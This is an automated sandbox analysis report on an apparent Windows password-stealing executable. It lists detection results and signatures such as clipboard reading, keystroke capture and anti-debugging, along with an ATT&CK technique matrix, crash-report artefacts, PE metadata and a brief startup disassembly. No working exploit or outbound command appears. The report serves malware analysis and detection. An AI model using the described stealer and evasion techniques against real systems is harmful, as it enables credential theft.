Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Analysis ID:756119
MD5:c852376dda1de89231d5f558255775e0
SHA1:2377355189c59e6f0d4c8792aa959425585dbc61
SHA256:2c9d6d1a184ed20ff0667797fe4d182170716fb1b179488979bc33f79a901208
Tags:exe
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to read the clipboard data
Found large amount of non-executed APIs
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe (PID: 5640 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe MD5: C852376DDA1DE89231D5F558255775E0)
    • WerFault.exe (PID: 5688 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeReversingLabs: Detection: 17%
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeJoe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B5293 FindFirstFileExW,0_2_001B5293
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B5347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_001B5347
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AB830 GetKeyboardState,0_2_001AB830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AACA0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,0_2_001AACA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AAA00 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalReAlloc,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_001AAA00
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001A18D00_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001BA9AA0_2_001BA9AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AC4C00_2_001AC4C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001A34E00_2_001A34E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001A8E700_2_001A8E70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: String function: 001AD900 appears 32 times
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeReversingLabs: Detection: 17%
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 464
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCommand line argument: --headless0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCommand line argument: --unix0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCommand line argument: --width0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCommand line argument: --height0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCommand line argument: --signal0_2_001A18D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCommand line argument: --server0_2_001A18D0
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE76B.tmpJump to behavior
Source: classification engineClassification label: mal52.winEXE@2/4@0/1
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B5A15 push ecx; ret 0_2_001B5A28
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: section name: .00cfg
Source: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeStatic PE information: section name: .voltbl
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeAPI coverage: 2.2 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B5293 FindFirstFileExW,0_2_001B5293
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B5347 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_001B5347
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AD72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001AD72C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B009E mov ecx, dword ptr fs:[00000030h]0_2_001B009E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B418D mov eax, dword ptr fs:[00000030h]0_2_001B418D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B258B GetProcessHeap,0_2_001B258B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AD720 SetUnhandledExceptionFilter,0_2_001AD720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001ADC2D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001ADC2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AD72C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001AD72C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001B37DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001B37DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AD945 cpuid 0_2_001AD945
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exeCode function: 0_2_001AD5D2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001AD5D2
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Command and Scripting Interpreter
Path Interception1
Process Injection
1
Virtualization/Sandbox Evasion
11
Input Capture
1
System Time Discovery
Remote Services11
Input Capture
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS Memory3
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin Shares2
Clipboard Data
Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
Obfuscated Files or Information
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe17%ReversingLabsWin32.Trojan.Convagent
SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
IP
192.168.2.1
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:756119
Start date and time:2022-11-29 16:55:10 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 45s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal52.winEXE@2/4@0/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 99.9% (good quality ratio 78.4%)
  • Quality average: 66.9%
  • Quality standard deviation: 40.2%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 5
  • Number of non-executed functions: 45
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 20.42.65.92
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
No simulations
No context
No context
No context
No context
No context
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8714732038462919
Encrypted:false
SSDEEP:96:QrxoFzqgLj9UhO9e77f5pXIQcQvc6QcEDMcw3Diji+HbHg/EFAeugtYsaV9w72nx:1nmHBUZMXojNPq/u7s+S274ItQ
MD5:EB7FC93BB3263EEB66BA489D43CB51AD
SHA1:B3A0BA916F954B0DA8AE7AC539303176757C0642
SHA-256:520926A637841923CCE32BB1A6238FAF87C40CAA2C76269E05F42C05D47440CF
SHA-512:96E789C2DF929CB4A656C630E7E99CCA9242930E1584EFF0EF56EDA9AE30FDBB975A9B198406866AD5A92C45274C9B087BB8CEC91A678BFABC21085094F46821
Malicious:false
Reputation:low
Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.4.3.3.7.1.5.1.5.8.9.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.4.3.3.7.2.7.1.9.0.1.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.0.e.a.6.5.e.-.3.6.2.c.-.4.6.b.3.-.b.3.6.9.-.3.3.c.c.1.4.1.d.9.6.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.e.4.9.b.a.4.-.c.5.9.b.-.4.8.b.8.-.8.6.b.e.-.9.d.8.4.f.f.7.5.9.7.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.3.2...P.W.S.X.-.g.e.n...1.6.1.8.8...7.0.9.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.8.-.0.0.0.1.-.0.0.1.a.-.0.3.9.2.-.d.d.8.8.5.6.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.a.9.7.e.b.e.a.e.1.0.7.0.8.9.f.8.7.4.8.f.e.7.8.a.7.a.a.a.3.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.3.7.7.3.5.5.1.8.9.c.5.9.e.6.f.0.d.4.c.8.7.9.2.a.a.9.5.9.4.2.5.5.8.
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 00:56:12 2022, 0x1205a4 type
Category:dropped
Size (bytes):40616
Entropy (8bit):2.003000119461151
Encrypted:false
SSDEEP:192:ghhUkWXpDiOcgjV+T71PyznTM89xyc62DujPpIYtn:+6hcY+T7ZyzTN92PSCn
MD5:3BCFE29C334432700B094F1FC88DD0F6
SHA1:F9E2D5799A2FB03010AA8C16F46FEBF8F3C27E35
SHA-256:3CCC35DB1139D794A77C61519F9A8BA09A7E97D3E054B8EE70BB1C089D482F7B
SHA-512:71D099A9DAAA3DC006D4C225FF1DB28D99CD91A4F188CEAE81382F0644DBCAD0D0A4DE3C41AF371E566CF5D82B8908C7E53C83C24954387A6CCEBE7F816D40E3
Malicious:false
Reputation:low
Preview:MDMP....... .......,..c.........................................&..........T.......8...........T........................... ................................................................................U...........B..............GenuineIntelW...........T...........)..c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8482
Entropy (8bit):3.6979070914958747
Encrypted:false
SSDEEP:192:Rrl7r3GLNiFI6hXx5dv6YqASUMegmfIS0Cpr+89bx9UsfXzlm:RrlsNiq6hXx5dv6YNSUMegmfISbx9Hf0
MD5:9A0987CA0C23DC8894104FD280D1C9CB
SHA1:86A49E082370B17C4C9386B5008FB580BA8A221F
SHA-256:4F9BF8E8B553A8DF0B80CBABBEB310193F14D9078FE513BC294342397ECC9F8A
SHA-512:346E611884A82B1D470D45296F60A9BB7AE881CAE125D542E974A994B3CBB237CC79B3A5FAE9C54F36E2BADD51DF57EBBA60367B4394F962A84C72582437516B
Malicious:false
Reputation:low
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.0.<./.P.i.d.>.......
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4787
Entropy (8bit):4.559141635088195
Encrypted:false
SSDEEP:48:cvIwSD8zsFJgtWI9f3Wgc8sqYji8fm8M4JEwTZWaFlB+q81LG/tiE3P9zWz/d:uITffwGgrsqYLJTB/nZ0/d
MD5:955A54B626D1F0F1007DAAB9D2C55C57
SHA1:9E2662E1C47A4A13C8D82BCB94D0395F91FEB409
SHA-256:CDBCCAAC3A30A680FE826E60D0A549404F4161ECC925EEC1A1462371F4602A86
SHA-512:AEF3C0DCBED91B7CEFE5ADF0B78FB7CC5075D9032BA452C27936693A929CA8D28B47F614A73D0CDFA6F71B41C246D94A9C95658FD5D87BCC6942ECBA7F616B36
Malicious:false
Reputation:low
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802046" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.182857922109804
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exe
File size:147968
MD5:c852376dda1de89231d5f558255775e0
SHA1:2377355189c59e6f0d4c8792aa959425585dbc61
SHA256:2c9d6d1a184ed20ff0667797fe4d182170716fb1b179488979bc33f79a901208
SHA512:35734b4b784630927e4da3cd2ffa69e664bdd0cedce1bfe7e8bc6f0c35b0f06174c05f553c4dd84b4843d257bc46892a9226ff6f719ff6fdcb06dd23fff8bb80
SSDEEP:3072:8OPPLcLPR2kaQ+nYwZbBPUxRC/akBYcgVg7JkWmjwaY4YFOnJKwy:8iLcLPRi/xB8gFLm8oJKd
TLSH:41E33B11B0C2C0B7C76724B301E796FB3A39B7219B615DDF5B580E686B395E0A630A37
File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................,.............@.......................................@........................................
Icon Hash:00828e8e8686b000
Entrypoint:0x40d32c
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x6385E3E9 [Tue Nov 29 10:50:17 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:8644442967ce2e1b40266fb36e00cd91
Instruction
call 00007F6A10CB93DBh
jmp 00007F6A10CB8FFFh
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F6A10CB918Fh
neg eax
pop ecx
sbb eax, eax
neg eax
dec eax
pop ebp
ret
push ebp
mov ebp, esp
cmp dword ptr [00425A60h], FFFFFFFFh
push dword ptr [ebp+08h]
jne 00007F6A10CB9189h
call 00007F6A10CBC612h
jmp 00007F6A10CB918Dh
push 00425A60h
call 00007F6A10CBC595h
pop ecx
neg eax
pop ecx
sbb eax, eax
not eax
and eax, dword ptr [ebp+08h]
pop ebp
ret
push 00000008h
push 00422EA8h
call 00007F6A10CB9701h
and dword ptr [ebp-04h], 00000000h
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
jne 00007F6A10CB91DFh
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F6A10CB91CEh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F6A10CB91C0h
mov eax, dword ptr [ebp+08h]
mov ecx, 00400000h
sub eax, ecx
push eax
push ecx
call 00007F6A10CB9302h
pop ecx
pop ecx
test eax, eax
je 00007F6A10CB91A9h
cmp dword ptr [eax+24h], 00000000h
jl 00007F6A10CB91A3h
mov dword ptr [ebp-04h], FFFFFFFEh
mov al, 01h
jmp 00007F6A10CB91A1h
mov eax, dword ptr [ebp-14h]
mov eax, dword ptr [eax]
xor ecx, ecx
cmp dword ptr [eax], C0000005h
sete cl
mov eax, ecx
ret
mov esp, dword ptr [ebp-18h]
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x217880x118.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x290000x1a8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000x14c4.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c5600xc0.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x21c1c0x37c.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
